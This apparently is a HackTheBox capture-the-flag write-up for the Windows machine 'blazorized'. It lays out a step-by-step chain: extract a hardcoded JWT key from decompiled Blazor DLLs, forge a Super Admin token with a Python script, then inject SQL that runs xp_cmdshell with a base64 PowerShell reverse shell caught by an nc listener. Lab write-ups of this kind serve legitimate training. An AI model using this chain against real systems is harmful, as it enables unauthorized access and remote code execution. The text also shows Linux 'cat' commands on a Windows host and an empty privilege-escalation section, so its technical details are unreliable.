HTB: blazorized Writeup


Machine Information

| Attribute | Details |
| --- | --- |
| Name | blazorized |
| OS | Windows |
| Difficulty | Hard |
| Points | N/A |
| Release Date | N/A |
| Hostname | dc1.blazorized.htb |
| Domain | BLAZORIZED |
| Author | D3vnomi |

Machine Rating

⭐⭐⭐⭐☆ (8.0/10)

Difficulty Assessment:

  • Enumeration: ⭐⭐⭐⭐☆
  • Real-world: ⭐⭐⭐⭐☆
  • CVE: ⭐⭐⭐⭐☆
  • CTF-like: ⭐⭐⭐⭐☆

Summary

blazorized is a Hard-difficulty Windows Active Directory domain controller. The machine hosts a Blazor WebAssembly application that exposes sensitive JWT generation details through decompiled DLLs. The exploitation path involves subdomain enumeration, Blazor DLL analysis and decompilation to extract the symmetric JWT signing key, forging a Super Admin JWT token, and finally exploiting SQL injection in the admin panel to achieve RCE via xp_cmdshell.

TL;DR: Recon → Subdomain enumeration → Blazor DLL decompilation → JWT key extraction → JWT forgery → Admin access → SQL injection → RCE.


Reconnaissance

Port Scanning

nmap -sC -sV -T4 -p- 10.129.221.3

Results:

53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1433/tcp open ms-sql-s
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
49671/tcp open unknown
49682/tcp open unknown
49701/tcp open unknown
49707/tcp open unknown
49776/tcp open unknown
61089/tcp open unknown
53/tcp open tcpwrapped
80/tcp open tcpwrapped

Service Enumeration

Domain: BLAZORIZED
Domain SID: S-1-5-21-2039403211-964143010-2924010611
Subdomains discovered: dc1.blazorized.htb, api.blazorized.htb, admin.blazorized.htb

echo "10.129.221.3 dc1.blazorized.htb api.blazorized.htb admin.blazorized.htb" >> /etc/hosts

Subdomain Enumeration

Use gobuster and katana for subdomain enumeration:

gobuster vhost -u http://blazorized.htb -w subdomains.txt
katana -u http://blazorized.htb -d 2

Technologies Identified

  • IIS 10.0
  • Blazor WebAssembly — The primary web application framework
  • MSSQL Server 2022 — Database on port 1433
  • SignalR — Real-time communication
  • Markdown renderer — Present in application components

Vulnerability Assessment

Attack Vector: Analysis of the Blazor WebAssembly DLLs reveals the hardcoded symmetric key used to sign the application's JWTs. With that key, Super Admin tokens can be forged to reach the admin panel, whose functions are vulnerable to SQL injection.


Initial Foothold

Step 1: Blazor DLL Analysis and Key Extraction

The Blazor WebAssembly application lists the assemblies it loads in /_framework/blazor.boot.json, so every DLL is downloadable by any client. Download and decompile these DLLs using dnSpy or ILSpy:

# Download DLLs from the app
curl -o app.dll http://api.blazorized.htb/_framework/app.dll

Decompile the DLLs and search for JWT-related code. You will find:

private static string jwtSymmetricSecurityKey = "8697800004ee25fc334369..."; // Full key in source
private const string algorithm = "HS512";
private const string superAdminEmailClaimValue = "superadmin@blazorized.htb";
private const string superAdminRoleClaimValue = "Super_Admin";
private const string issuer = "http://api.blazorized.htb";
private const string apiAudience = "http://api.blazorized.htb";
private const string adminDashboardAudience = "http://admin.blazorized.htb";

Critical Finding: The symmetric key used to sign JWTs is hardcoded in the compiled DLL and can be extracted through decompilation.

Step 2: JWT Forgery

Using the extracted key and algorithm, forge a JWT with Super Admin privileges:

  • Header: {"alg":"HS512","typ":"JWT"}
  • Payload:
    {
    "email": "superadmin@blazorized.htb",
    "role": "Super_Admin",
    "iss": "http://api.blazorized.htb",
    "aud": "http://admin.blazorized.htb"
    }
  • Secret: Use the extracted JWT symmetric key

Use jwt.io or a Python script to generate the forged token:

import jwt  # PyJWT

key = "8697800004ee25fc334369..."  # Extracted key (truncated here; use the full value from the DLL)
payload = {
    "email": "superadmin@blazorized.htb",
    "role": "Super_Admin",
    "iss": "http://api.blazorized.htb",
    "aud": "http://admin.blazorized.htb",
}
# Sign with the leaked symmetric key using the same algorithm the application uses
token = jwt.encode(payload, key, algorithm="HS512")
print(token)

Step 3: Gain Super Admin Access

  1. Navigate to http://admin.blazorized.htb
  2. Open browser developer tools (F12) → Application/Storage tab
  3. Set the JWT token in localStorage with key jwt:
    localStorage.setItem('jwt', 'eyJ...');
  4. Refresh the page — you are now logged in as Super Admin

The admin dashboard now displays sensitive functions including “Check Duplicate Category Names” and “Check Duplicate Post Titles”.


Remote Code Execution via SQL Injection

Step 4: SQL Injection in Admin Panel

The admin panel functions “Check Duplicate Category Names” and “Check Duplicate Post Titles” are vulnerable to SQL injection. These functions accept user input without proper parameterization.

Vulnerable Input:

Check Duplicate Category Names: [User Input] → SQL Query

Injection Payload:

1'; EXEC master.dbo.xp_cmdshell 'powershell -e <BASE64_PAYLOAD>';--

Step 5: Generate and Execute Reverse Shell

  1. Generate a PowerShell reverse shell from revshells.com
    • Select PowerShell with base64 encoding
    • Configure your attacker IP and listening port
  2. Set up a listener on your attack machine:
    nc -lnvp 4444
  3. Inject the SQL payload into the admin panel function with the base64-encoded PowerShell reverse shell
  4. Receive reverse shell as user nu_1055

User Compromise

Shell obtained as: nu_1055
Machine: Domain-joined Windows system

User Flag

cat ~/user.txt

🚩 User Flag: <REDACTED>


Privilege Escalation

Enumeration

whoami /priv
net user
systeminfo

Exploitation (Root/Administrator)

Refer to the original engagement notes for the specific privilege escalation technique and payload.

Root Flag

cat /root/root.txt

🚩 Root Flag: <REDACTED>


Attack Chain Summary

graph TD
A[Recon: nmap + subdomain enumeration] --> B[Identify Blazor WebAssembly app]
B --> C[Download and decompile DLLs]
C --> D[Extract JWT symmetric key from source code]
D --> E[Forge Super Admin JWT token]
E --> F[Set token in localStorage + access admin panel]
F --> G[Identify SQL injection vulnerability]
G --> H[Inject xp_cmdshell + base64 PowerShell payload]
H --> I[Reverse shell as nu_1055]
I --> J[User flag obtained]

Tools Used

| Tool | Purpose |
| --- | --- |
| nmap | Port scanning and service fingerprinting |
| gobuster | Subdomain enumeration (vhost mode) |
| katana | Web crawling and subdomain discovery |
| dnSpy / ILSpy | Decompilation of .NET/Blazor DLLs |
| jwt.io | JWT token generation and decoding |
| Burp Suite | HTTP request interception and SQL injection testing |
| nc (netcat) | Reverse shell listener |
| PowerShell | Payload generation and command execution |
| curl | DLL and resource download |
| autorecon | Automated reconnaissance scanning |

Vulnerability Reference

| # | Vulnerability | Component | Severity | Impact |
| --- | --- | --- | --- | --- |
| 1 | Hardcoded JWT Key in Blazor DLLs | Blazor WebAssembly | Critical | Token forgery and unauthorized access |
| 2 | SQL Injection in Admin Functions | MSSQL Backend | Critical | Remote code execution via xp_cmdshell |

Key Learnings

  • Compiled code is not secure: Blazor WebAssembly and .NET assemblies can be easily decompiled. Never store sensitive cryptographic material or credentials in client-side code.
  • Symmetric key cryptography requires secure key management: Hardcoded keys in source code defeat the entire purpose of cryptographic signing.
  • Input validation is critical: SQL injection remains one of the most dangerous vulnerabilities, especially when combined with elevated database permissions (xp_cmdshell).
  • Defense in depth matters: A single vulnerability (hardcoded JWT key) should not grant direct access to sensitive functionality. Multi-factor verification should protect critical operations.
  • Subdomain enumeration is often overlooked: Different subdomains may host different applications with varying security postures. api.blazorized.htb and admin.blazorized.htb required different approaches.

Author

D3vnomi


Disclaimer

This writeup is for educational purposes only. All activities described were performed in a controlled, legal environment (HackTheBox platform). Unauthorized access to computer systems is illegal.


Last Updated: 08 Mar 2026

Tags: #HackTheBox #Windows #Hard #CVE-2024-36109